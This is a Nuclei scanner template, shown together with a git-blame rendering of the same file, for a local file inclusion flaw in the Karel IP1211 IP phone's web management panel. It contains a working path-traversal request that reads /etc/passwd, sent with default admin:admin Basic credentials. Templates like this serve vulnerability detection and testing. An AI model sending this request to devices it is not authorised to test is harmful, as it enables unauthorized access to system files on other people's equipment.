nuclei-templates/http/vulnerabilities/other/karel-ip-phone-lfi.yaml

id: karel-ip-phone-lfi

info:
  name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
  reference:
    - https://cxsecurity.com/issue/WLB-2020100038
    - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: karel,lfi
  metadata:
    max-request: 1

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
    headers:
      Authorization: Basic YWRtaW46YWRtaW4=
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
Create karel-ip-phone-lfi.yaml 2021-09-06 08:54:33 +00:00			`id: karel-ip-phone-lfi`

			`info:`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion`
Create karel-ip-phone-lfi.yaml 2021-09-06 08:54:33 +00:00			`author: 0x_Akoko`
			`severity: high`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.`
Update karel-ip-phone-lfi.yaml 2021-09-06 09:17:45 +00:00			`reference:`
			`- https://cxsecurity.com/issue/WLB-2020100038`
			`- https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
Create karel-ip-phone-lfi.yaml 2021-09-06 08:54:33 +00:00			`tags: karel,lfi`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
Create karel-ip-phone-lfi.yaml 2021-09-06 08:54:33 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create karel-ip-phone-lfi.yaml 2021-09-06 08:54:33 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"`
Update karel-ip-phone-lfi.yaml 2021-09-10 06:36:54 +00:00			`headers:`
			`Authorization: Basic YWRtaW46YWRtaW4=`
Create karel-ip-phone-lfi.yaml 2021-09-06 08:54:33 +00:00			`matchers-condition: and`
			`matchers:`

			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0"`

			`- type: status`
			`status:`
			`- 200`